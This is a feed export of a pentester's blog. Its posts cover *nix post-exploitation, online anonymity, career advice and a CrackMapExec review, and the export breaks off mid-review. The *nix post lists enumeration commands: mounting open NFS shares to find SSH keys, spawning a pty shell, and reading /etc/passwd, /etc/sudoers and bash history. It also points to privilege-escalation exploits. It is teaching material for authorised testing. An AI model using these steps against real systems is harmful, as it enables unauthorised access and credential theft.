tag:blogger.com,1999:blog-57892943987601461862024-02-20T03:55:03.900-05:00Hillbilly StoryTimeUnknownnoreply@blogger.comBlogger21125tag:blogger.com,1999:blog-5789294398760146186.post-3837768710889769112020-09-01T12:59:00.052-04:002020-11-17T13:10:15.423-05:00So, You Got Access to A *NIX System… Now What?<p><i><b>Note to Reader:</b> For simplicity, I will be referring to all Unix, Linux, and other Unix-like systems simply as *nix, unless a specific distinction needs to be made.</i></p><p>As a pentester, you will likely come across a *nix system at some point. If you are like many of the people I have worked with and encountered in the security industry, you are much more familiar with Microsoft Windows-based systems than *nix systems. This is completely fine. Most attackers focus largely on Windows-based systems due to the marketshare, end-user exploitability, and attack surface. <a href="https://www.statista.com/statistics/701020/major-operating-systems-targeted-by-ransomware/">Microsoft Windows in 2019 made up over 97% of the most attacked operating system</a> in the ransomware category. In whole, *nix systems can make up a large percentage of the ecosystem of an enterprise (often not the largest), however is often less focused on from an attack surface perspective. In most networks, when you encounter *nix systems, they are typically less prominent than when compared to the numbers of Microsoft Windows based systems. Common uses of *nix systems tend to be development systems, mobile devices, database systems, embedded devices (firewalls, web cameras, etc.), web services such as jBoss, Tomcat, or Jenkins, and cloud infrastructure such as AWS. Whereas Microsoft Windows is much more commonly found running on end user workstations, email systems, and, of course, domain controllers (as well as other roles found in *nix).</p><p><span></span></p><a name='more'></a>While *nix systems are significantly different from Microsoft Windows systems, they do share some common categories of vulnerabilities, such as insecure network shares, vulnerable web services, user/system trusts, buffer overflows, and misconfigurations.<p></p><p>Once you identify a *nix system you wish to attack, you need to decide what approach you want to take. You do not always need to have a shell session on a *nix system, nor do you always need to be ‘root’. Sometimes, mounting exported NFS shares is enough for you to gain the information you need. A common misconfiguration on *nix systems is to export a network share without restricting it to certain IPs or users. As an attacker, you can identify any access restrictions on the target NFS shares by using the showmount command.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>showmount -e 192.168.1.1</p><p>Export list for 192.168.1.1:</p><p>/secret 192.168.1.2</p><p>/home (everyone)</p></blockquote><p>The above example shows that 192.168.1.1 is exporting/sharing two directories. One of them, ‘/secret’, is restricted such that it can only be mounted from 192.168.1.2, whereas the other, ‘/home’, can be mounted by ‘(everyone)’. In this scenario, I would mount the ‘/home’ share locally and then search through it and its subdirectories looking for interesting files. A couple of the files I may look for are SSH keys and .history or .bash_history files to see if they contained passwords. I have found entire database backup files stored in user home directories in the past, as well as documents containing lists of sensitive passwords for all kinds of internal systems. When I find an open NFS share, I always take the time to investigate it.</p><p>However, many times you will want shell access, so you will need to first find a way onto the target system. This could be as simple as connecting to the system via SSH or telnet with weak user passwords or possibly by exploiting known vulnerabilities/misconfigurations in network/web services. The most common access to a *nix system that I have encountered is via password brute-forcing/guessing, default/blank credentials for jBoss/Tomcat/Jenkins/etc., sniffing credentials from network traffic, and finally via remote service exploits.</p><p>Note to Reader: For the remainder of this article, we will assume you have obtained a shell session on a *nix system.</p><p>Once shell access to a *nix system has been obtained, the first item I usually address is whether I have a fully functional shell. You will usually be able to quickly identify if you have a limited shell (usually as a result of a web exploit, service command injection, or some other shell access which was not via SSH or telnet), as the lack of a prompt is a great indicator. To remedy this situation, my typical go-to solution is to spawn a new bash shell via python, assuming python is present on the system. Keep in mind that python may not be present, but python3 is, so adjust accordingly.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>python -c 'import pty;pty.spawn("/bin/bash")'</p><p>user@192.168.1.1:/var/www/$</p></blockquote><p>Unfortunately, this does not provide tab completion. If you are fine with that, then skip this section, otherwise, this is how to correct it. First, you will need to press Control-Z to send the shell to the background. Then type stty raw -echo. This is a command that is responsible for allowing our bash keyboard shortcuts to pass through to the remote shell. Now we need to get back to the remote shell, so type fg. This should bring the remote shell back from the background. Finally, type reset to reset the terminal.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>stty raw -echo</p><p>fg</p><p>reset</p></blockquote><p>In most cases, this should be fine. However, you may occasionally notice that the up arrow is not working or that you cannot clear the screen. To address these issues, type the following:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>user@192.168.1.1:/var/www/$ export TERM=xterm</p><p>user@192.168.1.1:/var/www/$ export SHELL=bash</p></blockquote><p>With that out of the way, you will now want to get a ‘lay of the land’. This includes identifying your access level, the OS version, which (if any) sensitive files you have access to, and seeing which LOLbins (Living off the Land) (<a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a>) scripts and programs you can access.</p><p></p><ul style="text-align: left;"><li>uname -a<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Current kernel version</li><li>env<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Current environment variable</li><li>pwd<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Current directory</li><li>whoami<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Current user</li><li>history<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Command history for current user</li><li>cat ~/.bash.history<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Bash history</li><li>sudo –1<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Commands you can run as sudo</li><li>cat /etc/sudoers<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Who is in sudoers file</li><li>cat /etc/passwd<span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span>– Additional users</li><li>find / -perm /4000<span style="white-space: pre;"> </span>-ls <span style="white-space: pre;"> </span>– Find accessible SETUID files</li></ul><p></p><p>You can definitely do this by hand, manually typing each command and gathering the output, or you could use one of many enumeration tools that people have developed to assist. Here is a short list of some I use:</p><p></p><ul style="text-align: left;"><li>LinEnum (<a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a>)</li><li>LinuxPrivChecker (<a href="https://github.com/sleventyeleven/linuxprivchecker">https://github.com/sleventyeleven/linuxprivchecker</a>)</li><li>UnixPrivescCheck (<a href="https://github.com/pentestmonkey/unix-privesc-check">https://github.com/pentestmonkey/unix-privesc-check</a>)</li></ul><p></p><p>At this point, you could attempt a privilege escalation attack to root or some other privileged user account. That said, I would suggest investigating the files available as the current user, as you do not always need to be root to gain access to the data you want.</p><p>If you find you do need access to root or some other privileged user account, you may be able to use the data gathered previously to elevate your access or you may wish to use a different known exploit such as DirtyCow or DirtySock. It is usually a quick process to determine which exploits will work by looking at the output of uname -a for the kernel/OS version and then searching Google or <a href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> for possible exploits. If you wish to approach it in a more scripted manner, you may wish to look at the Linux Exploit Suggester 2 script (<a href="https://github.com/jondonas/linux-exploit-suggester-2">https://github.com/jondonas/linux-exploit-suggester-2</a>).</p><p>This article is in no way a complete how-to on *nix systems, but I hope it provided you with some basic level of insight into attacking *nix systems and some thoughts as to what tools/capabilities you have to work with.</p><p>In parting, here are some additional resources for you on attacking *nix systems. Enjoy!</p><p></p><ul style="text-align: left;"><li>G0tmi1k’s ‘Basic Linux Privilege Escalation’ Article:</li><ul><li><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a></li></ul><li>IppSec YouTube videos:</li><ul><li><a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA">https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA</a></li></ul><li>Null Byte YouTube video discussing Linux Exploit Suggester 2:</li><ul><li><a href="https://youtu.be/PE1A1j_xKUE">https://youtu.be/PE1A1j_xKUE</a></li></ul><li>Details and exploit for Dirty Sock exploit</li><ul><li><a href="https://initblog.com/2019/dirty-sock/">https://initblog.com/2019/dirty-sock/</a></li></ul><li>Details and exploits for DirtyCow exploit</li><ul><li><a href="https://dirtycow.ninja">https://dirtycow.ninja</a></li></ul><li>For additional practice in attacking *nix systems, consider:</li><ul><li>HackTheBox.eu</li><ul><li><a href="https://www.hackthebox.eu/">https://www.hackthebox.eu/</a></li></ul><li>VulnHub</li><ul><li><a href="https://www.vulnhub.com/">https://www.vulnhub.com/</a></li></ul><li>Metasploitable</li><ul><li><a href="https://information.rapid7.com/download-metasploitable-2017.html">https://information.rapid7.com/download-metasploitable-2017.html</a></li></ul></ul></ul><p></p>
<script>
window.location = "https://www.trustedsec.com/blog/so-you-got-access-to-a-nix-system-now-what/";
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-57181320639833863252020-05-21T12:53:00.042-04:002020-11-17T12:59:04.040-05:00A Beginner’s Guide To Staying Safe/Anonymous Online<p><b> WHAT IS OSINT?</b></p><p>It is probably safe to assume you have heard of OSINT at some point (Open Source INTelligence). However, if you have not, it can very generally be described as the collection and analysis of data gathered from publicly accessible sources. People who perform OSINT have a wide variety of sources they can pull from and many different techniques they can use. For example, they could scrape information about you, your friends and family, or your company from your social media profiles. They could search through the multitude of data breaches that have been made public, looking for passwords to your accounts. The amount of data that can be found online can be rather daunting. This article will cover some steps you can take to limit your exposure, access to your information, and why that is important.<span></span></p><a name='more'></a><p></p><p><b>WHAT IS ANTI-OSINT?</b></p><p>Anti-OSINT is the process and techniques by which one attempts to prevent the gathering of accurate OSINT data about a person or thing. For many people, this could be imagined as the domain of entities such as spy agencies, conspiracy theorists, or hermits who are living off the grid.</p><p>In the next section, we will cover why this list is too limited and why everyone should be concerned about their privacy.</p><p><b>WHY IS ONLINE PRIVACY IMPORTANT AND DO I NEED IT?</b></p><p>Data in all forms can be used. While this can be a positive in some instances, it can also be used for nefarious reasons. When that data is your personal information, the results can be significant.</p><p>Potential employers may search your social media profiles to get an idea of who you are, and what they find may have an impact on their impression of you. Other companies, such as search engines or any company that offers a service for “free”, can make a LOT of money off of you and your information. There is no such thing as a free service. If the company does not charge for their service, they are likely selling the information you provide (intentionally and unintentionally) to other data brokers. Many times, this is used for targeted marketing and market research, but it can easily be used to profile you as well.</p><p>“Bad people” can use data to do bad things to you or to other people in your name. Given a few pieces of information about you, someone could open new financial accounts in your name, request sensitive information from your health care providers, or cause any number of other issues for you.</p><p>Often I hear people tell me that they have nothing to hide and that no one is even after their information anyway. I disagree with both of those statements. Everyone has something they want to hide or protect, such as their financial account numbers or medical records. Other common pieces of information can be used in combination, such as your date of birth, mother’s maiden name, and so forth.</p><p>Other people may live or work in countries with repressive or tyrannical governments where they may face fines, imprisonment, or even death based on their activities or beliefs. For these people, maintaining anonymity and privacy is critical to their safety.</p><p>Perhaps you have someone who means to harm you. This could be a disgruntled employee, an ex-significant other, a hate group, or a random online stalker. Maintaining proper privacy and control over your information can help prevent these individuals from locating you.</p><p>Are you completely satisfied with every decision you have ever made in your life? For many of us, it is likely that you have made a few bad choices and you do not wish those to limit your possibilities in the future.</p><p>The list can go on and on. Ultimately, everyone probably has something they care to hide, and to the right person or company, that data can be of great importance.</p><p><b>WAIT, ALL OF MY INFORMATION IS ALREADY ONLINE?</b></p><p>In the modern era, it is likely that many companies already have substantial access to your data. Do you have an email account with Google or Microsoft? Do you play games on Facebook? Do you have completed profiles on your social media accounts? Do you have store loyalty cards? All of these result in someone having access to some aspect of your information. The question is, how do we wrangle it in?</p><p>First, you must accept that you will likely never be able to completely remove all of your information from online sources. However, that does not mean you cannot remove most of it.</p><p>Start by making a list of every active online account you know you have. If you are not sure if you remember them all, you can use services such as https://namechk.com/ and https://checkusernames.com/ to see where your username/handle has been used.</p><p>For each account, log in and go to the profile page. Next, edit everything you can as to remove as much accurate information about you as possible; you may not be able to change or remove every piece of information. Then, attempt to delete the account. You may ask why it’s worth changing all of your information if you are just going to delete the account anyway. Well, when the account is deleted, that does not always mean the data is wiped from the databases. This way, even if the data is not entirely wiped, it should not contain your accurate information.</p><p>With that done, you need to search for anywhere else your information has been stored. This is typically done with search engine lookups. Search for your name or any piece of identifying information, and for every site that returns results, see if they have a request form or some other way to remove your information. As mentioned before, we are striving for a best effort here – you will not be able to remove everything.</p><p><b>HOW DO I MAINTAIN MY PRIVACY?</b></p><p>Ok, so you have detailed as much as you can of your online information. Now, how do we maintain that privacy? The most critical aspect is to periodically check for new information pertaining to you online and removing it.</p><p>Another step you can take is to freeze your credit at all credit agencies: Equifax, Trans Union, Experian, Innovis. This will prevent several types of identity theft attacks that can be performed against you. It will also alert you to anytime someone performs a credit check on you.</p><p>One simple but necessary thing that can be done is to ask friends and family to not post/share info about you or tag you in photos.</p><p>When filling out a form/application/questionnaire, only fill out as much as required, as many times not all the fields are necessary. Even for the necessary/required items, question why they are needed and see if you can forgo filling them in. Even if you have to fill in an answer, make a determination if it is absolutely necessary for you to accurately provide that piece of information. Does the loyalty program for your grocery store need to know your real home address?</p><p><b>HOW DO I CREATE AN ALTERNATE ONLINE IDENTITY?</b></p><p>What’s that? You want even more privacy? How about creating a sockpuppet account then? A sockpuppet is an alternate online identity used to hide/obscure your identity that is not tied back to you.</p><p>First and foremost, let me be clear that I am not a lawyer, nor do I have any form of a legal background. You should make every effort to not perform any illegal activity and ensure that everything you do in creating and using the sockpuppet is legal.</p><p>Now, let’s make a list of the items you will need to create your sockpuppet – a name, an email address, a physical address, possibly a phone number, and some way to pay for everything.</p><p>For a name, this can be anything you wish (I typically use some variation of my own name). Changing one letter, using your middle name instead of your first name, or even using your grandmothers last name, all are viable options here.</p><p>Next, you will probably want an email address. It is virtually impossible to do anything online without an email address. I would recommend finding an email address that does not track your activities, does not require that you verify your information, and that encrypts your data. One possible provider is Proton Mail, however, there are many other that would work as well. Just make sure they fit your needs without compromising your desired privacy level.</p><p>If you are like most of us, you will eventually want to buy something. I would recommend that you pay cash for everything, but that is not really possible online. For online purchases, I would buy a pre-paid debit card and use that card to buy what I want online. Yes, that does incur a bit of overhead and inconvenience, but it protects your privacy and makes it significantly more difficult to tie a purchase back to you.</p><p>If you wish to have a phone number associated with your sockpuppet, the best option is a pre-paid cell phone. Many times, these can be purchased without providing any details about yourself. Also, you can pay for these in cash or with the debit card you obtained earlier.</p><p>If you buy anything online and want it shipped to you, but do not want to associate your home address with your sockpuppet, then use a mailing service where you can send the deliveries. It has been my experience that the best option is the UPS Store, but feel free to research this further on your own.</p><p>On the technology side of your sockpuppet, you will likely want to obscure your home IP address – the obvious choice for this is a VPN. When looking for a VPN to use, try to find one that helps maintain your privacy. It should not retain any logs/data of your activities, it should allow you to pay with your prepaid debit card, and it should not require you to provide any identifying information to set up an account. Keep evaluating different VPN providers, if a security concern arises with your current provider, switch to a different provider.</p><p>For web browsers, I would suggest always using their “incognito” mode and an ad blocker. If you want additional levels of security, you could also use a Tor enabled browser, however, using Tor over your VPN may incur a significant bandwidth throttle due to the multiple levels of protection and routing.</p><p>When it comes to passwords, you should use separate passwords for every service. This is something you should already be doing.</p><p>Finally, be willing to destroy the account if needed! If the sockpuppet gets compromised or has outlived its usefulness, then delete all associated accounts and start over. The sockpuppet account should be used for transitory activities and not be designed for long time usage.</p><p><b>PARTING THOUGHTS…</b></p><p>The information and techniques presented above may not be for everyone. Your needs and how much privacy you feel you need will likely differ from mine. As such, use this as an intro to online privacy and some of the possibilities of how to protect your data. Use as much or as little as you feel comfortable with. Remember that our privacy and data are valuable, do not give it away for free.</p><p><b>HELPFUL RESOURCES:</b></p><p>This article was just an overview and intro to online privacy. There are many resources available if you would like to learn more.</p><p>Some helpful videos:</p><p></p><ul style="text-align: left;"><li>Tim Vetter – “Winning and Quitting the Privacy Game: What it *REALLY* takes to have True Privacy in the 21st Century”</li><ul><li><a href="https://www.youtube.com/watch?v=bxQSu06yuZc">https://www.youtube.com/watch?v=bxQSu06yuZc</a></li></ul><li>Scott M – “Anti-OSINT…or hiding from The Man”</li><ul><li><a href="https://www.youtube.com/watch?v=bxQSu06yuZc">https://www.youtube.com/watch?v=bxQSu06yuZc</a></li></ul><li>Michael James – “ANTO OSINT AF: How to become untouchable”</li><ul><li><a href="https://www.youtube.com/watch?v=WFIGP8MRSJI">https://www.youtube.com/watch?v=WFIGP8MRSJI</a></li></ul></ul><p></p><p>Get a new SSN: <a href="https://faq.ssa.gov/en-US/Topic/article/KA-02220">https://faq.ssa.gov/en-US/Topic/article/KA-02220</a></p><p>Get a UPS Store Address: <a href="https://www.theupsstore.com/mailboxes/personal-mailboxes">https://www.theupsstore.com/mailboxes/personal-mailboxes</a></p><p>Freeze your credit:</p><p></p><ul style="text-align: left;"><li><a href="https://www.equifax.com/personal/credit-report-services/">https://www.equifax.com/personal/credit-report-services/</a></li><li><a href="https://www.experian.com/freeze/center.html">https://www.experian.com/freeze/center.html</a></li><li><a href="https://www.transunion.com/credit-freeze">https://www.transunion.com/credit-freeze</a></li><li><a href="https://www.innovis.com/securityFreeze/index">https://www.innovis.com/securityFreeze/index</a></li></ul><p></p><p>Reduce spam phone calls: <a href="https://www.donotcall.gov/">https://www.donotcall.gov/</a></p><p>Check if your email against breaches: <a href="https://haveibeenpwned.com/">https://haveibeenpwned.com/</a></p>
<script>
window.location = "https://www.trustedsec.com/blog/a-beginners-guide-to-staying-safe-anonymous-online/";
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-59290611697783288522018-10-30T12:49:00.014-04:002020-11-17T12:52:50.656-05:00Of Failure and Success<p></p><blockquote><p><i> Experience is simply the name we give our mistakes.</i></p><p><i>— Oscar Wilde</i></p></blockquote><p></p><p>Over the course of a year, I watch many InfoSec conference presentations whether in person at the conference or via a recording on YouTube, I read a multitude of amazing blog articles, and I follow and read the messages of many InfoSec personalities on Social Media. The thing that keeps coming to mind throughout all of this is, “Wow there are some amazingly smart people out there doing some wonderful stuff.” Then following that are the thoughts, “Why am I not that good? Why is it so difficult for me to create some new tool or make some new discovery? Why do I keep making mistakes?” From discussing with others on social media and at conferences I have become well aware that it is not just me having these thoughts.</p><p><span></span></p><a name='more'></a>I cannot really speak for anyone else, but I can share my own experiences. As part of my own career, I have had some nice successes, I have presented at conferences, and I have created some useful tools. At the same time, I have had a sizable number of setbacks, mistakes, failures, and missteps. At times I have had severe difficulties seeing my own successes over the piles of failures. This has caused me to back out of speaking engagements at conferences, to not publish a new tool or blog article for fear that people will not like it or they will ridicule it, and at least once it has kept me from finding a new job. At the time I felt that, due to my own perceived failures, no other employer would want to employ me. Because of this, I decided to just stick with a job at a company that I did not like or want.<p></p><p>As time has gone on, I have come to realize that I am not alone in these thoughts and situations. We tend to only focus on the successes of those we want to be like and only see the failures in ourselves. For me, it was critical to remember and realize that those I admired and looked up to have their flaws as well. They too made mistakes and had failures. But they kept moving on.</p><p>After a while, sometime around 2012, I decided to take the plunge and started submitting to several conferences and releasing some tools I had been working on. I had no idea what would happen. But I made a promise to myself that I would see it though for one year and then decide if it was a positive thing or not. At first, I was terrified, and I still am prior to any presentation, video recording, or tool release. My first conference talks were predictably bad, but as the year went on and I kept presenting, I slowly got better. Since then I have continued presenting several times a year and I have slowly started liking it even though I am still terrified every time I stand on the stage.</p><p></p><blockquote><p><i>It’s fine to celebrate success but it is more important to heed the lessons of failure.</i></p><p><i>— Bill Gates</i></p></blockquote><p></p><p>Sometime in 2016, I decided I would like to try to help others like myself by sharing my stories. Stories of my mistakes, failures, bad choices, and so on. So, I created a twitter account, created a presentation slide deck to submit to conferences, and started making YouTube videos. All of this was my attempt to help others realize that we ALL make mistakes. When you see someone presenting some new exploit or an awesome piece of research, you are just seeing the final result of what was likely months, if not years, of work to get it to that point. Everyone gets frustrated, has setbacks, and yes, some mistakes are bigger than others. I do not discount that. But it is what you do with those mistakes and setbacks that will help determine your future.</p><p>One of my mentors from early in my career told me it is okay to make mistakes as long as you learn from them and strive to not make those same mistakes again.</p>
<script>
window.location = "https://www.trustedsec.com/blog/failure-and-success/";
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-28418483495593717062018-09-21T12:33:00.013-04:002020-11-17T12:45:16.357-05:00How Can I Become a Pentester?<p>After I tell someone that I am a pentester or that I work in InfoSec, the most common question I get asked is if I can help them fix their computer. The second most common question I get is, “How can I become a pentester?”</p><p>My answer is usually fairly concise and to the point, “Learn how computers and networks work, learn what rules are in place to protect them, and then learn how to circumvent those rules.” While that answer is fine if I am in a hurry, I thought I might take this time to elaborate a bit more and provide a more helpful answer.</p><p><b><span></span></b></p><a name='more'></a><b>PENTESTER</b><p></p><p>First, let’s take a step back and understand that while the term “pentester” gets used quite often, it is not the only role/position available in Information Security (InfoSec). Within the realm of InfoSec, there are primarily two general categories: “attacker” and “defender”. Within each of the “attacker” and “defender” categories, there are numerous subcategories and roles, all of which are critical to producing and maintaining secure systems, networks, and users. While this article will focus more on the “attacker/pentester” side of the equation, the concepts could be applied to any other role as well.</p><p><b>EDUCATION</b></p><p>Does someone need a formal education in Computer Science to become a pentester? Short answer: No! I have been in the InfoSec field, mostly as a pentester, long enough to know that nearly anyone can become a pentester. I have had coworkers that have had formal education in information systems as well as co-workers that used to be auto mechanics or chemical engineers. While a strong education will not go amiss, it is by no means a requirement. If you are willing to learn and educate yourself, you should do fine.</p><p>Earlier I mentioned that having a prior education in InfoSec was not a requirement. I would recommend that someone looking to get into InfoSec and people who are already in the field should continue to seek additional education and training. The InfoSec field changes rather quickly and to keep up to date on all the latest vulnerabilities, tools, attacks, and defenses, it is imperative that you continue to educate yourself. That education can come in the form of classic college classes, InfoSec specific training, attending conferences, or performing some self-guided research.</p><p><b>SPECIALTIES</b></p><p>One of the interesting aspects of pentesting and InfoSec as a whole is that no one is great at everything. While most penetsters are somewhat knowledgeable of most aspects of pentesting, each will generally have one or two areas in which they focus. Personally, I prefer social engineering, programming, and red-teaming; however, when it comes to mobile devices, Internet of Things (IoT), and low-level system driver attacks, I will defer to others that know those areas much better than I do. This is a great aspect of the InfoSec field. Since no one needs to know everything, we are all free to specialize as needed and we can get help from others when we encounter a situation where we are less knowledgeable.</p><p><b>MOVING TOWARDS YOUR CAREER</b></p><p>As you start your journey toward becoming a pentester, you will find that many times it comes in handy to have a close relationship with a few more senior individuals in the field. Again, this is not necessary for becoming a penster, but it does make certain aspects easier. This is what is typically referred to as “Finding a mentor.” This mentor does not have to be just one person, you could have mentors for each of the various aspects of pentesting you wish to pursue. These mentors can help provide suggestions of tools and techniques to learn, suggestions of classes or training that may be of benefit, and be available to talk with about any other aspect of your career. Now that I have said that, let me also say that, you should not necessarily allow someone else to fully guide your career path or your development. It is up to you to make those decisions and the mentors, if you have any, are there to just provide suggestions as needed.</p><p>Talking about training, mentors, and areas of focus are great, but will that get you a job? Probably not by themselves. Most employers will be looking for evidence of your abilities and knowledge. This evidence can come in many forms such as years of experience in the field. If you are reading this I can probably safely assume you do not have years of experience, so what else can you do? Some employers like to see certain professional certifications on your resume. I will not get into the merits of each particular certification here but suffice it to say that some certifications hold more weight in the pentester field than others. Examples of these are OSCP, OSCE, and OSEE. If you do not have years of experience or the certifications the employers are looking for, my general suggestion is that you start a blog so that you can share samples of your knowledge. This can be write-ups about the latest exploit or vulnerability that is making the news. It could be about a new tool that someone wrote. It could even be a review of an old tool or exploit where you share your views or opinion on it. If you are a researcher, write up blog articles about it. If you are so inclined to be a developer, start a GitHub, GitLab, or similar account where you can host any code or tools you have developed. At the same time, go ahead and write up a blog article about the code or tool.</p><p><b>EXPERIENCE</b></p><p>If you are looking for more pentesting experience without actually breaking the law by attacking other people’s networks, I would suggest participating on Capture the Flag (CTF) competitions. Most of the CTFs are free to participate and other than your time, will not cost you anything. Another great resource is reading the write-ups of other people who have completed other CTFs. Those write-ups may contain new ideas or ways of approaching particular situations that you were not aware of. If you do not want to participate in formal CTFs, there are plenty of other standalone challenges that you can try. Most of these come in the form of downloadable VMs (Virtual Machines). You will download the VM from a site like VulnHub, load up the VM in either VMware or VirtualBox, then attempt to attack the system and achieve the specified goal. Here again, many of these will have write-ups written by other people who have completed them already.</p><p><b>RESEARCH</b></p><p>If you are more into research, then set up a home lab. This lab could be a VM server if you are focused on operating systems or electronics gear if you are interested in hardware hacking. In both cases, I would not recommend going out and spending lots of money. You can usually run several VMs from whatever laptop or desktop you already have. As for hardware labs, you can usually get started with just a few cheap items like a soldering iron, a logic analyzer, and a UART and JTAG connectors. Obviously, this is not everything you may need, but it should get you started. Now, what about targets to attack/research? For operating systems, most of us have at least 1 Microsoft system we can possibly target, and most Linux operating systems are free to download and use. If you want to attack hardware devices, eBay, second-hand stores and garage sales can be great resources for cheap equipment to buy and attack.</p><p><b>PERSONAL EXPERIENCE</b></p><p>Personally, I have a blog, a GitHub account, and I enjoy giving presentations at InfoSec conferences. Presenting at conferences is not something that everyone enjoys, but if you do not mind, it is a great way to present yourself to the industry, share your knowledge with everyone, and possibly get to meet potential employers. I have met so many amazing people because of my presentations and people coming up to talk to me afterward.</p><p>As a final suggestion, do not forgo developing your “soft skills” such as public communication and writing. Regardless of the path your career takes, these skills will serve you well whether it is in a job interview, presenting a report to a customer, writing a report, presenting at a conference, or even writing your resume. Ultimately, it does not matter how awesome your exploit was, or how many years of personal experience you have, if you cannot convey your ideas to others, it will mean very little.</p>
<script>
window.location = "https://www.trustedsec.com/blog/become-a-pentester/";
</script>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-64049736314909094292018-04-10T23:43:00.002-04:002020-11-17T12:46:07.620-05:00Tool Review - CrackMapExec<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="566" data-original-width="340" height="320" src="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" width="192" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
Source</h2>
<div>
<a href="https://github.com/byt3bl33d3r/CrackMapExec">https://github.com/byt3bl33d3r/CrackMapExec</a></div>
<div>
<br /></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<span><a name='more'></a></span>Author(s)</h2>
<div>
Marcello Salvati/<a href="https://twitter.com/byt3bl33d3r">@byt3bl33d3r</a></div>
<div>
<br /></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
Description</h2>
<div>
<div style="text-align: left;">
CrackMapExec (CME) is designed to be used as a post-exploitation tool to help facilitate the detection, enumeration, accessing, and further exploitation of data/security of an Active Directory Network.<br />
<br /></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/byt3bl33d3r/CrackMapExec/blob/master/LICENSE">BSD License</a><br />
<br />
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
How to Install</h2>
On Kali linux it is as simple as<br />
<blockquote class="tr_bq">
<i># apt-get install crackmapexec</i></blockquote>
For other Debian/Ubuntu linux it is as simple as<br />
<blockquote class="tr_bq">
<i># apt-get install -y libssl-dev libffi-dev python-dev build-essential</i><i># pip install crackmapexec</i></blockquote>
If by chance you feel the need to install from source, the steps are as follows:<br />
<blockquote class="tr_bq">
<i># apt-get install -y libssl-dev libffi-dev python-dev build-essential</i><i># pip install --user pipenv</i><i># git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec</i><i># cd CrackMapExec && pipenv install</i><i># pipenv shell</i><i># python setup.py install</i></blockquote>
There are also versions available for Arch Linux and Mac OSX. For more information please visit the <a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation">WIKI</a>.<br />
<br /></div>
<div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most command line tools, CME provides a useful help screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwsDF8qGQ5_hYIzCeWpCit6vR5FV9HahGM_vXrCBXtZKkWEv2YUlbCWKzW6neSdWNuRbpL4gcDIPa1G2SbCYyYURX8znVIikqDDcyqHlrt0x2Yk3CnespI8wcM_g4pbqTEd5wtrLcwwg/s1600/cme_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="1182" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwsDF8qGQ5_hYIzCeWpCit6vR5FV9HahGM_vXrCBXtZKkWEv2YUlbCWKzW6neSdWNuRbpL4gcDIPa1G2SbCYyYURX8znVIikqDDcyqHlrt0x2Yk3CnespI8wcM_g4pbqTEd5wtrLcwwg/s400/cme_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
It also provides context help, for example, here is a sample of the help for the "smb" protocol:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
